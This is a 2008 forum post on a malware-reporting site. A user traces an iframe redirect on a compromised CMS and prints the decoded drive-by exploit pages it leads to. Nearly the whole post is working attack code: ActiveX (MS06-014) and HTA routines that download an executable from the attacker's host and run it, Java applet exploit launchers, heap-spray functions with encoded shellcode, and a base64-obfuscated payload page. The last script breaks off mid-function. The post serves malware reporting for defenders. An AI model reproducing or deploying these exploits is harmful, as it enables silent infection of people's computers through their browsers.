CastleCops, Internet Crime Fighters
Need help? Click here to register for free! Absolutely zero advertisements on this site!

Donation/Premium
spacer
Donations. Become Premium Today! Premium Icon
block bottom
Security Central
spacer
· Home
· PIRT/Fried Phish
· MIRT
· SIRT
· Deutsch
· Wiki
· Newsletter
· O16/ActiveX
· CLSID List
· Contest2007
· Downloads
· Feedback (send)
· Forums
· HijackThis
· Hijacktrend
· LSPs
· My Downloads
· O18
· O20
· O21
· O22
· O23
· O9
· Premium
· Private Messages
· Proxomitron
· Reviews
· Search
· StartupList
· Stories Archive
· Submit News
· WsIRT
· Your Account
· Acceptable Use Policy
block bottom
spacer spacer
 Forum FAQForum FAQ   SearchSearch   UsergroupsUsergroups   ProfileProfile   Login to check your private messagesLogin to check your private messages   LoginLogin   Your Favorite ForumsSelect FavForums 

iframe attack: several exploits

 
Post new topic   Reply to topic       All -> FavForums -> Web Malware Links [del.icio.us!] [digg it!] [reddit!]
View previous topic :: View next topic  
Author Message
philipp2

Trooper
Trooper


Joined: Apr 11, 2008
Posts: 22
Location: Germany
PostPosted: Sat Apr 12, 2008 5:32 pm    Post subject: iframe attack: several exploits
Reply with quote

hi,
i came across an iframe attack in some cms installation. here are the details:

hxxp://www.yourxxxblog.biz/js_go_f1.php
--> hxxp://www.dir4you.org/TDS/go.php?sid=1
redirects to hxxp://www.dir4you.org/6/testasd/
here is some huge piece of obfuscated javascript.
decoded it looks like this:

Code:

<HTML xmlns:IE>
<HEAD>
         <STYLE type='text/css'>
            IE\:clientCaps {behavior:url(#default#clientcaps)}
         </STYLE>
</HEAD>
<IE:clientCaps ID="oClientCaps" />
<script type="text/javascript" language="JavaScript">

function GetVersion(CLSID)
{
 if (oClientCaps.isComponentInstalled(CLSID,"ComponentID")){return oClientCaps.getComponentVersion(CLSID,"ComponentID").split(",");}
 else {return Array(0,0,0,0);}
}

function Get_Win_Version(IE_vers)
{
 if (IE_vers.indexOf('Windows 95') != -1) return "95"
 else if (IE_vers.indexOf('Windows NT 4') != -1) return "NT"
 else if (IE_vers.indexOf('Win 9x 4.9') != -1) return "ME"
 else if (IE_vers.indexOf('Windows 98') != -1) return "98"
 else if (IE_vers.indexOf('Windows NT 5.0') != -1) return "2K"
 else if (IE_vers.indexOf('Windows NT 5.1') != -1) return "XP"
 else if (IE_vers.indexOf('Windows NT 5.2') != -1) return "2K3"
}


function MS06014CreateO(o, n) {
 var r = null;
 try { eval('r = o.CreateObject(n)') }catch(e){}
 if (! r) {try { eval('r = o.CreateObject(n, "")') }catch(e){}}
 if (! r) {try { eval('r = o.CreateObject(n, "", "")') }catch(e){}}
 if (! r) {try { eval('r = o.GetObject("", n)') }catch(e){}}
 if (! r) {try { eval('r = o.GetObject(n, "")') }catch(e){}}
 if (! r) {try { eval('r = o.GetObject(n)') }catch(e){}}
 return(r);
}

function MS06014Go(a) {
 var s = MS06014CreateO(a, "WScript.Shell");
 var o = MS06014CreateO(a, "ADODB.Stream");
 var e = s.Environment("Process");
 var url = 'http://www.dir4you.org/6/file.php?test11';
 var xml = null;
 var bin = e.Item("TEMP") + "mbroit.exe";
 var dat;
 try { xml=new XMLHttpRequest(); }
 catch(e) {
 try { xml = new ActiveXObject("Microsoft.XMLHTTP"); }
 catch(e) {
 xml = new ActiveXObject("MSXML2.ServerXMLHTTP");
 }
 }
 if (! xml) return(0);
 xml.open("GET", url, false)
 xml.send(null);
 dat = xml.responseBody;
 o.Type = 1;
 o.Mode = 3;
 o.Open();
 o.Write(dat);
 o.SaveToFile(bin, 2);
 s.Run(bin,0);
}

function MS06014Exploit() {
 var i = 0;
 var t = new Array('{BD96C556-65A3-11D0-983A-00C04FC29E36}','{AB9BCEDD-EC7E-47E1-9322-D4A210617116}','{0006F033-0000-0000-C000-000000000046}','{0006F03A-0000-0000-C000-000000000046}','{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}','{6414512B-B978-451D-A0D8-FCFDF33E833C}','{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}','{06723E09-F4C2-43c8-8358-09FCD1DB0766}','{639F725F-1B2D-4831-A9FD-874847682010}','{BA018599-1DB3-44f9-83B4-461454C84BF8}','{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}','{E8CCCDDF-CA28-496b-B050-6C07C962476B}',null);

 while (t[i]) {
 var a = null;

 if (t[i].substring(0,1) == '{') {
 a = document.createElement("object");
 a.setAttribute("classid", "clsid:" + t[i].substring(1, t[i].length - 1));
 } else {
 try { a = new ActiveXObject(t[i]); } catch(e){}
 }

 if (a) {
 try {
 var b = MS06014CreateO(a, "WScript.Shell");
 if (b) {
 MS06014Go(a);
 return(1);
 }
 } catch(e){}
 }
 i++;
 }
 return(0);
}
function pass2()
{
 try {
 var unsafeclass = document.maniman.getClass().forName("sun.misc.Unsafe");
 var unsafemeth = unsafeclass.getMethod("getUnsafe", null);
 var unsafe = unsafemeth.invoke(unsafemeth, null);
 document.maniman.foobar(unsafe);
 var chenref = unsafe.defineClass("omfg", document.maniman.luokka, 0, document.maniman.classSize);
 var chen = unsafe.allocateInstance(chenref);
 chen.setURLdl("http://www.dir4you.org/6/file.php?test11");
 chen.setUname("789");
 chen.setCID("other");
 return chen.perse(unsafe);
 } catch (d) {return -1;}
 return -1;
}

function pass3(){
 document.write("<applet archive=OP.jar code=OP.class width=1 height=1 MAYSCRIPT>");
 document.write("<param name=usid value=us0105>");
 document.write("<param name=linkurl value=\"http://www.dir4you.org/6/file.php?test11\"></applet>");
 return 1;
}

function Negcash(){
document.write("<applet code=animan.class name=maniman height=1 width=1 MAYSCRIPT></applet>");
if (pass2() != 1) {
 pass3();
}

}

function ExploitMS03011(){
document.write("<applet archive=\"ms03011.jar\" code=\"MagicApplet.class\" width=1 height=1>");
document.write("<param name=\"ModulePath\" value=\"http://www.dir4you.org/6/file.php?test11\"></applet>");
}

function MS05001Exploit() {
document.write("<OBJECT id=\"hhctrl_HTML_Opener\" type=\"application/x-oleobject\" classid=\"clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11\" style=\"display:none\"> <PARAM name=\"Command\" value=\"Related Topics, MENU\"><PARAM name=\"Button\" value=\"Text:Just a button\"><PARAM name=\"Window\" value=\"$global_blank\"><PARAM name=\"Item1\" value=\"command;ms-its:addremov.chm::/win_addprog_window_component.htm\"></OBJECT>");
document.write("<textarea id=\"ObjMaker\" cols=10 rows=10 style=\"display:none\"><OBJECT id=\"hhctrl_JS_Runner\" type=\"application/x-oleobject\" classid=\"clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11\" style=\"display:none\"><PARAM name=\"Command\" value=\"Related Topics, MENU\"><PARAM name=\"Button\" value=\"Text:Just a button\"><PARAM name=\"Window\" value=\"$global_blank\"></textarea>");
document.write("<OBJECT id=\"DHTML_Edit\" classid=\"clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A\" width=10 height=10 align=\"middle\"><PARAM NAME=\"ActivateApplets\" VALUE=\"1\"><PARAM NAME=\"ActivateActiveXControls\" VALUE=\"1\"></OBJECT> ");
document.write("<DIV id=\"ObjectContainer\"></DIV>");

HTA_URL="http://www.dir4you.org/6/testasd/";
var Obj_body=document.all.ObjMaker.innerText;
HTA_location='\",ms'+'hta,'+HTA_URL+'ms05001.hta.php?adv=789'+'\"';
Init_HTA='var alink=document.links[0].href%3Baparams=alink.split(\" \")%3Bchmpath=aparams[0].split(\",\")%3Bnlink=chmpath[0]+'+HTA_location+'+\" \"+aparams[1]+\" \"+aparams[2]+\" \"+aparams[3]%3Bdocument.links[0].href=nlink%3Bdocument.links[0].click();';
Obj_Last_Param="\r\n\<PARAM name=\"Item1\" value='command;javascript:"+Init_HTA+"'>";
document.all.ObjMaker.innerText=Obj_body+Obj_Last_Param+'</OBJECT>';
ObjectContainer.innerHTML=document.all.ObjMaker.value;
hhctrl_HTML_Opener.HHClick();
setTimeout("hhctrl_JS_Runner.HHClick()",500);
setTimeout("self.focus()",1000);
}

function ExploitAll(){

if (navigator.appName=="Microsoft Internet Explorer")
{

 var IEversion=navigator.appVersion;
 var IEplatform=navigator.platform;
 if (IEplatform.search("Win32") != -1)
 {
 var WinOS=Get_Win_Version(IEversion);
 FullVersion=clientInformation.appMinorVersion;
 PatchList=FullVersion.split(";");
 var JVM_vers = GetVersion("{08B0E5C0-4FCB-11CF-AAA5-00401C608500}");

 var XP_SP2_patched=0;

 if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
 {
 ExploitMS03011();
 }
 if(MS06014Exploit() != 1){
 Negcash();
 for (var i=0; i < PatchList.length; i++){
 if (PatchList[i]=="SP2"){
 XP_SP2_patched=1;
 }
 }
 if(XP_SP2_patched==0){
 MS05001Exploit();
 }
 }
 }
}
else if (navigator.appName=="Netscape")
{
 j=navigator.userAgent.indexOf('Firefox');
 if (j != -1)
 {
 j=j+"Firefox/".length;
 var FF_name=navigator.userAgent.substr(j);
 k=FF_name.indexOf(" ");
 if (k != -1)
 {
 FF_name=FF_name.substr(0,k);
 }
 FF_vers=FF_name.split(".");
 if (FF_vers[2] == undefined)
 {
 FF_vers[2]=0;
 }
 if (FF_vers[0]==0){
 window.location="http://www.dir4you.org/6/testasd/mfsa200550.php?adv=789";
 }else if (FF_vers[0] == 1){
 if ((FF_vers[1]==0)&&(FF_vers[2]<5)) {
 window.location="http://www.dir4you.org/6/testasd/mfsa200550.php?adv=789";
 }else{
 window.location="http://www.dir4you.org/6/testasd/ms06006.php?adv=789";
 }
 }
 }
}
}
document.write('<iframe src="http://www.freesexonline.biz/10/" style="display:none"></iframe>');
</script>
</head>
<body onload="ExploitAll()">
</body>
</html>


now here we have a lot of exploits.

hxxp://www.dir4you.org/6/testasd/ms05001.hta.php?adv=789 :
Code:

<HTML><HEAD> <HTA:APPLICATION id=PXP APPLICATIONNAME="PXP" SHOWINTASKBAR=NO CAPTION=YES SINGLEINSTANCE=YES MAXIMIZEBUTTON=NO MINIMIZEBUTTON=NO WINDOWSTATE=MINIMIZE /> </HEAD> <BODY> <SCRIPT> self.moveTo(5000,5000); function Dl(Rp,Ln) { try { var SC=new ActiveXObject("MSScriptControl.ScriptControl"); SC.Language="JavaScript"; SC.Reset(); var oX=new ActiveXObject("Microsoft.XMLHTTP"); oX.Open("GET",Rp,0); oX.Send(); sAX=unescape("%41DODB%2eStream"); var oS=new ActiveXObject(sAX); SC.AddObject("oAS", oS); SC.AddObject("oXS", oX); aC="var XB=oXS.responseBody;oAS.Type=1;oAS.Mode=3;oAS.Open();oAS.Write(XB);"+"oAS.Sa"+"veToFile('"+Ln+"',2);"; var oA=new ActiveXObject("Shell.Application"); SC.ExecuteStatement(aC); oA.ShellExecute(Ln); r=0; } catch(e){r=-1;} return r; }


hxxp://www.dir4you.org/6/testasd/mfsa200550.php?adv=789 :
Code:

<html>
<head>
<script language="javascript">
    var Shellcode=unescape("%u9090%u9090%u3390%u33c0%uebc9%u5e12%ub966%u0100%ufe8b%u2e80%u8007%u0436%ue246%uebf7%ue805%uffe9%uffff%ub5f4%u0b0b%u620b%uac67%u0b3b%u0b0b%u4b96%u960f%u1f7b%u96b0%u1373%ufa96%u0775%uf364%u0b55%u0b0b%u04ed%u7273%u0b71%u730b%u7d78%u706f%u0257%u9619%uf3f3%u0b37%u0b0b%uef8e%u962b%u75df%u5e2b%u5902%uca07%u2307%u6e5f%u787b%u47ca%u0723%u6831%u6883%u47c9%u1323%u3e0b%u5bcb%u5e5b%u5b5a%u5902%u961b%u75df%u5e08%u5902%u0213%u0f59
%u595c%u7896%u963f%u3877%u0e83%u59f8%u7996%u0e2b%u3ef8%u54d4%ub04c%uc80e%ue63e%uc112%u431b%u77fd%ucc13%u10d6%ue50e%uf64b%u46fc%u7822%u61ea%u6196%u0e27%u69e0%u0f96%u9656%u1f61%ue00e%u0796%u0e96%ub6c8%u6461%uf3ce%u025c%u0202%u5191%uef11%ue6f0%u03ef%u01a3%u1195%ue381%u7eed%u2539%u7b32%u7773%u7b77%u3245%u7a32%u7a7a%u8431%u7872%u707d%u6768%u687e%u7d6c%u736e%u7431%u6971%u3272%u7e7b%u3276%u7872%u3177%u737b%u427b%u406d%u6970%u6c7e%u3b3d%u383b%u3830%u0b3b");
    function Run_BOF() {
   var spraySlide1 = unescape("%u002C%u11C0");
   var spraySlide2 = unescape("%u002C%u1200");
   var spraySlide3 = unescape("%u9090%u9090");
   var heapSprayToAddress=0x12000000;
   var heapBlockSize=0x400000;
   var ShellcodeSize=Shellcode.length * 2;
   var spraySlideSize=heapBlockSize-(ShellcodeSize+0x38);
   spraySlide1 = getSpraySlide(spraySlide1,spraySlideSize);
   spraySlide2 = getSpraySlide(spraySlide2,spraySlideSize);
   spraySlide3 = getSpraySlide(spraySlide3,spraySlideSize);
   MemoryBlocks=(heapSprayToAddress-0x400000)/heapBlockSize;
   memory = new Array();
   for (i=0;i<MemoryBlocks;i++)
   { memory[i]=(i%3==0) ? spraySlide1 + Shellcode:
   (i%3==1) ? spraySlide2 + Shellcode: spraySlide3 + Shellcode; }
   location.href="javascript:void (new InstallVersion());";
   var eaxAddress = 0x1180002C;
   (new InstallVersion).compareTo(new Number(eaxAddress >> 1));
   }
   function getSpraySlide(spraySlide, spraySlideSize) {
while (spraySlide.length*2<spraySlideSize)
{ spraySlide+=spraySlide; }
spraySlide=spraySlide.substring(0,spraySlideSize/2);
return spraySlide;
}

</script>
</head>
<body onload="Run_BOF()"/>
</html>


hxxp://www.dir4you.org/6/testasd/ms06006.php?adv=789 :
Code:

<script language=JavaScript>function lrkiq(str){var fjussf="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";var wgasghq="";var hzivnpfo="";for(var i=0;i<str.length;i++){wgasghq+=ahpfvutqr((6-fjussf.indexOf(str.substr(i,1)).toString(2).length))+fjussf.indexOf(str.substr(i,1)).toString(2);if(wgasghq.length%8==0){hzivnpfo+=String.fromCharCode(parseInt(wgasghq.substr(0,8),2));wgasghq="";}else if (wgasghq.length>8){hzivnpfo+=String.fromCharCode(parseInt(wgasghq.substr(0,8),2));wgasghq=wgasghq.substr(8,(wgasghq.length-8));}else if (wgasghq.length<8){continue;}}function ahpfvutqr (n) {var b ="";for(var i=0;i<n;i++){b+="0";}return b;}return hzivnpfo;}document.write(lrkiq("IAo8SFRNTD48SEVBRD48U0NSSVBUIGxhbmd1YWdlPSJqYXZhc2NyaXB0Ij4KdmFyIHNwcmF5ID0gdW5lc2NhcGUoIiV1NDE0MSV1NDE0MSV1NDE0MSV1NDE0MSV1NDE0MSV1NDE0MSV1NDE0MSV1NDE0MSV1NDI0MiV1NDM0MyIpOwp3aGlsZSAoc3ByYXkubGVuZ3RoIDwgMHgxMDAwMDAwKSB7CnNwcmF5Kz1zcHJheTsgfQpzcHJheSs9dW5lc2NhcGUoIiV1OTA5MCV1OTA5MCV1MzM5MCV1MzNjMCV1ZWJjOSV1NWUxMiV1Yjk2NiV1MDBlZSV1ZmU4YiV1MmU4MCV1ODAwMiV1MDIzNiV1ZTI0NiV1ZWJmNyV1ZTgwNSV1ZmZlOSV1ZmZmZiV1YWFlZCV1MDQwNCV1NWYwNCV1YTU
2OCV1MDQzNCV1MDQwNCV1NDQ4YiV1OGIxMCV1MjA3NCV1OGJiMSV1MGM2YyV1Zjc4YiV1MDg2YSV1ZWM1ZCV1MDQ0YSV1MDQwNCV1ZmRlMiV1NmY2YyV1MDQ2ZSV1NmMwNCV1NzI3OSV1NzE3MCV1ZmY1OCV1OGIxNiV1ZWNlYyV1MDQzOCV1MDQwNCV1ZjA4MyV1OGIyNCV1NmFlMCV1NTMyNCV1NTZmZiV1YzcwOCV1MWMwOCV1NjM2MCV1Nzk3NCV1NDhjNyV1MDgxYyV1NjkyZSV1Njk3YyV1NDhjNiV1MGMxYyV1MzMwNCV1NTRjNCV1NTM1NCV1NTQ1NyV1NTZmZiV1OGIxNCV1NmFlMCV1NTMwOSV1NTZmZiV1ZmYwYyV1MTA1NiV1NTY1NSV1Nzk4YiV1OGI0MCV1Mzk3OCV1MDM3YyV1NTZmOSV1N
zY4YiV1MDMyNCV1MzNmOSV1NGRjZCV1YjE0NSV1YzkwMyV1ZGIzMyV1YmUwZiV1M2MxNCV1NzhmMiV1YzUwYyV1MTFjYiV1ZGEwMyV1ZWI0NCV1M2JmNSV1NzkxZiV1NWVlNyV1NWU4YiV1MDMyOCV1NjZlMSV1MTA4YiV1OGI0YiV1MjA1ZSV1ZTEwMyV1MDg4YiV1MDM4YiV1YWJjOSV1NWQ1ZSV1ZWNjMyV1ZmY1NSV1ZmZmZiV1NGU4ZSV1ZjAwZSV1ZGJmMSV1ZmNmMCV1ZmU5YyV1MGU4YSV1ZGM3ZSV1NzNlMiV1MWEzNiV1NzQyZiV1Nzg2YyV1NzQ3OCV1MmYzYSV1NjIyZiV1Nzg3OSV1NzY2NSV1NzI2OSV1NjU3OCV1MmU3OCV1NmY2MyV1MmY3MSV1Nzk2ZiV1MmU3OCV1NmM3NCV1M2Y3NCV1NDE2M
iV1N2M2OSV1MzQ3NCV1MDQzOCIpOwo8L1NDUklQVD48L0hFQUQ+CjxCT0RZPgo8RU1CRUQgU1JDPSItLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS
0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0
tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tL
S0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS
0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tQUFBQUJCQkJDQ0NDREREREVFRUVGRkZGR0dHR0hISEhJSUlJSkpKSktLS0tMTExMQUFBTk5OTk9PT09BQUFRUVFRUlJSUlNTU1NUVFRUVVVVVVZWVlZXV1dXWFhYWFlZWVlaWlpaMDAwMDExMTEyMjIyMzMzMzQ0NDQ1NTU1NjY2Njc3Nzc4ODg4OTk5OS4mI3g3NzsmI3g2ZDsmI3g3NjsiPjwvRU1CRUQ+CjwvQk9EWT4KPC9IVE1MPgo="));</script>


hxxp://www.freesexonline.biz/10/ :
Code:

<html xmlns="http://www.w3.org/1999/xhtml">
<body>
<script>

var aaaaaa = 1;
var bbbbbb = 2;
var cccccc = 3;

function my(aaaaaa,bbbbbb,cccccc)             {
return (aaaaaa + bbbbbb + cccccc + aaaaaa);   }

   /*
   var shellcode = unescape("%u4343%u4343%u0feb%u335b%u66c9%u80b9%u8001%uef33" +
   "%ue243%uebfa%ue805%uffec%uffff%u8b7f%udf4e%uefef%u64ef%ue3af%u9f64%u42f3%u9f64%u6ee7%uef03%uefeb" +
   "%u64ef%ub903%u6187%ue1a1%u0703%uef11%uefef%uaa66%ub9eb%u7787%u6511%u07e1%uef1f%uefef%uaa66%ub9e7" +
   "%uca87%u105f%u072d%uef0d%uefef%uaa66%ub9e3%u0087%u0f21%u078f%uef3b%uefef%uaa66%ub9ff%u2e87%u0a96" +
   "%u0757%uef29%uefef%uaa66%uaffb%ud76f%u9a2c%u6615%uf7aa%ue806%uefee%ub1ef%u9a66%u64cb%uebaa%uee85" +
   "%u64b6%uf7ba%u07b9%uef64%uefef%u87bf%uf5d9%u9fc0%u7807%uefef%u66ef%uf3aa%u2a64%u2f6c%u66bf%ucfaa" +
   "%u1087%uefef%ubfef%uaa64%u85fb%ub6ed%uba64%u07f7%uef8e%uefef%uaaec%u28cf%ub3ef%uc191%u288a%uebaf" +
   "%u8a97%uefef%u9a10%u64cf%ue3aa%uee85%u64b6%uf7ba%uaf07%uefef%u85ef%ub7e8%uaaec%udccb%ubc34%u10bc" +
   "%ucf9a%ubcbf%uaa64%u85f3%ub6ea%uba64%u07f7%uefcc%uefef%uef85%u9a10%u64cf%ue7aa%ued85%u64b6%uf7ba" +
   "%uff07%uefef%u85ef%u6410%uffaa%uee85%u64b6%uf7ba%uef07%uefef%uaeef%ubdb4%u0eec%u0eec%u0eec%u0eec" +
   "%u036c%ub5eb%u64bc%u0d35%ubd18%u0f10%u64ba%u6403%ue792%ub264%ub9e3%u9c64%u64d3%uf19b%uec97%ub91c" +
   "%u9964%ueccf%udc1c%ua626%u42ae%u2cec%udcb9%ue019%uff51%u1dd5%ue79b%u212e%uece2%uaf1d%u1e04%u11d4" +
   "%u9ab1%ub50a%u0464%ub564%ueccb%u8932%ue364%u64a4%uf3b5%u32ec%ueb64%uec64%ub12a%u2db2%uefe7%u1b07" +
   "%u1011%uba10%ua3bd%ua0a2%uefa1%u2E2E%u6C2F%u616F%u2F64%u6966%u656C%u652E%u6578");
   */


   var shellcode="%u54EB%u758B%u8B3C%u3574%u0378%u56F5%u768B%u0320%u33F5%u49C9%uAD41%uDB33%u0F36%u14BE%u3828%u74F2%uC108%u0DCB%uDA03%uEB40%u3BEF%u75DF%u5EE7%u5E8B%u0324%u66DD%u0C8B%u8B4B%u1C5E%uDD03%u048B%u038B%uC3C5%u7275%u6D6C%u6E6F%u642E%u6C6C%u4300%u5C3A%u2E55%u7865%u0065%uC033%u0364%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0840%u09EB%u408B%u8D34%u7C40%u408B%u953C%u8EBF%u0E4E%uE8EC%uFF84%uFFFF%uEC83%u8304%u242C%uFF3C%u95D0%uBF50%u1A36
%u702F%u6FE8%uFFFF%u8BFF%u2454%u8DFC%uBA52%uDB33%u5353%uEB52%u5324%uD0FF%uBF5D%uFE98%u0E8A%u53E8%uFFFF%u83FF%u04EC%u2C83%u6224%uD0FF%u7EBF%uE2D8%uE873%uFF40%uFFFF%uFF52%uE8D0%uFFD7%uFFFF%u2E2E%u6C2F%u616F%u2F64%u6966%u656C%u652E%u6578";
   

   var hSTyA = 0x05050505;

   var hScode = shellcode;
   var hPPcLSs = unescape(hScode);
   
</script>
<script>
   var hBFFSSx = 0x400000;

   var hPpll = hPPcLSs.length * 2;
        ff=hPpll+0x38
   var XusASSs = hBFFSSx - ff;

   var StyleSX = unescape("%u9090%u9090");
   StyleSX = getStyleSX(StyleSX,XusASSs);
        ee=hSTyA - 0x400000
   hB = ee/hBFFSSx;

   memory = new Array();

   for (i=0;i<hB;i++)
      memory[i] = StyleSX + hPPcLSs;

   function getStyleSX(StyleSX, XusASSs)
   {
      while (StyleSX.length*2<XusASSs)
      {
         StyleSX += StyleSX;
      }
      StyleSX = StyleSX.substring(0,XusASSs/2);
      return StyleSX;
   }

</script>
<object id=target classid="CLSID:88d969c5-f192-11d4-a65f-0040963251e5" >
</object>
<script>
var obj = null;

obj = document.getElementById('target').object;

try {
obj.open(new Array(),new Array(),new Array(),new Array(),new Array());
} catch(e) {};

obj.open(new Object(),new Object(),new Object(),new Object(), new Object());   

obj.setRequestHeader(new Object(),'......');
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);

</script>


</body></html>


<HTML><HEAD><SCRIPT language="javascript">
function Crash() {
var oElreem="focus";
var oR = document.getElementById(oElreem).createTextRange();
}
sfxdRR="%u54EB%u758B%u8B3C%u3574%u0378%u56F5%u768B%u0320%u33F5%u49C9%uAD41%uDB33%u0F36%u14BE%u3828%u74F2%uC108%u0DCB%uDA03%uEB40%u3BEF%u75DF%u5EE7%u5E8B%u0324%u66DD%u0C8B%u8B4B%u1C5E%uDD03%u048B%u038B%uC3C5%u7275%u6D6C%u6E6F%u642E%u6C6C%u4300%u5C3A%u2E55%u7865%u0065%uC033%u0364%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0840%u09EB%u408B%u8D34%u7C40%u408B%u953C%u8EBF%u0E4E%uE8EC%uFF84%uFFFF%uEC83%u8304%u242C%uFF3C%u95D0%uBF50%u1A36%u702F
%u6FE8%uFFFF%u8BFF%u2454%u8DFC%uBA52%uDB33%u5353%uEB52%u5324%uD0FF%uBF5D%uFE98%u0E8A%u53E8%uFFFF%u83FF%u04EC%u2C83%u6224%uD0FF%u7EBF%uE2D8%uE873%uFF40%uFFFF%uFF52%uE8D0%uFFD7%uFFFF%u2E2E%u6C2F%u616F%u2F64%u6966%u656C%u652E%u6578";

sfxdRR = shellcode;

var slle=unescape(sfxdRR);
function Run_BOF() {
var hssPPA = 0x3c0974c2;
var hBFFSSx = 0x400000;
var hPpll = slle.length * 2;
frt=hPpll+0x38;
var XusASSs = hBFFSSx - frt;
ret="%u9090%u9090";
var StyleSX = unescape(ret);
